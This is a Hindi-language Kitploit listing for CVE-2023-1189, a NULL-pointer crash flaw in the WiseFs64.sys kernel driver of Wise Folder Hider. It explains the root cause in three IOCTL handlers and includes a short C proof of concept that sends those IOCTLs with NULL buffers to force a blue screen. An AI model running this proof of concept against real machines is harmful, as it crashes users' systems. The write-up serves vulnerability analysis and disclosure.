Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-1189 — CVE-2023-1189 PoC & Exploit | Kitploit
उपकरण/GitHubGitHub/le0s1mba/cve-2023-1189
Vulnerability AnalysisExploitationBinary Exploitation
GitHuble0s1mba/cve-2023-1189

CVE-2023-1189

CVE-2023-1189 PoC & Exploit

रिपॉजिटरी देखें
8 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-1189

1. अवलोकन

आइटमविवरण
CVE IDCVE-2023-1189
भेद्यता प्रकारImproper Resource Shutdown or Release (CWE-404)
प्रभावित सॉफ्टवेयरWiseCleaner Wise Folder Hider
भेद्य घटकWiseFs64.sys (Kernel Driver)
भेद्य संस्करण4.4.3.202
CVSSNVD - 5.5(Medium), VulDB - 3.3(Low)
प्रकाशन तिथि2023.03.06

यह भेद्यता एक स्थानीय सेवा अस्वीकृति भेद्यता है जो हमलावर को उपयोगकर्ता अधिकारों से एक विशिष्ट IOCTL के माध्यम से कर्नेल NULL पॉइंटर डिरेफरेंस को प्रेरित करके सिस्टम को BSOD स्थिति में लाने की अनुमति देती है।

2. Root Cause

CVE-2023-1189 भेद्यता 4.4.3.202 संस्करण के Wise Folder Hider प्रोग्राम की सेटअप द्वारा बनाए गए WiseFs64.sys कर्नेल ड्राइवर में होती है।

समग्र भेद्यता प्रवाह इस प्रकार है:

image.png

उस प्रवाह को विस्तार से देखें:

DriverEntry func

सबसे पहले, DriverEntry फ़ंक्शन में, डिस्पैच टेबल के इंडेक्स 14 पर dispatchDeviceControl फ़ंक्शन सेट किया जाता है।

इसके माध्यम से, \\\\.\\WiseFs पर आने वाले सभी IOCTL dispatchDeviceControl को भेजे जाते हैं।

dispatchDeviceControl func

dispatchDeviceControl फ़ंक्शन में प्रवेश करने पर, सबसे पहले यह जांच की जाती है कि क्या यह नियंत्रण उपकरण है, और यदि हाँ, तो यह handleControlDeviceIoctl फ़ंक्शन में जाता है।

handleControlDeviceIoctl func

handleControlDeviceIoctl फ़ंक्शन में वास्तविक IOCTL कोड को संसाधित करने का तर्क होता है।

विभिन्न IOCTL कोडों में, 0x222400, 0x222404, और 0x222410 में बफर का मान NULL है या नहीं, इसकी पुष्टि करने वाला भाग छोड़ दिया गया है।

इसलिए, जब बफर NULL होने पर उपरोक्त IOCTL को कॉल किया जाता है, तो ड्राइवर बफर तक पहुँचता है, जिससे NULL पॉइंटर डिरेफरेंस होता है और यह BSOD की ओर ले जाता है।

3. PoC & Exploit

root@kitploit:~
#include <stdio.h>
#include <Windows.h>
#include <winioctl.h>

#define SymLinkName L"\\\\.\\WiseFS"

HANDLE hDevice;

int main(int argc, char* argv[]) {
	DWORD dwWrite = 0;

	hDevice = CreateFileW(SymLinkName, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
	if (hDevice == INVALID_HANDLE_VALUE) {
		printf("failed to CreateFile\n");
		return 1;
	}

	// case 0x222400
	// DeviceIoControl(hDevice, 0x222400, NULL, 0, NULL, 0, &dwWrite, NULL);

	// case 0x222404
	// DeviceIoControl(hDevice, 0x222404, NULL, 0, NULL, 0, &dwWrite, NULL);

	// case 0x222410
	// DeviceIoControl(hDevice, 0x222410, NULL, 0, NULL, 0, &dwWrite, NULL);
	
    CloseHandle(hDevice);
    return 0;
}

4. संदर्भ

  • https://nvd.nist.gov/vuln/detail/CVE-2023-1189
  • https://www.cve.org/CVERecord?id=CVE-2023-1189
  • https://cwe.mitre.org/data/definitions/404.html
  • https://github.com/zeze-zeze/WindowsKernelVuln/tree/master/CVE-2023-1189
टूल डाउनलोड करें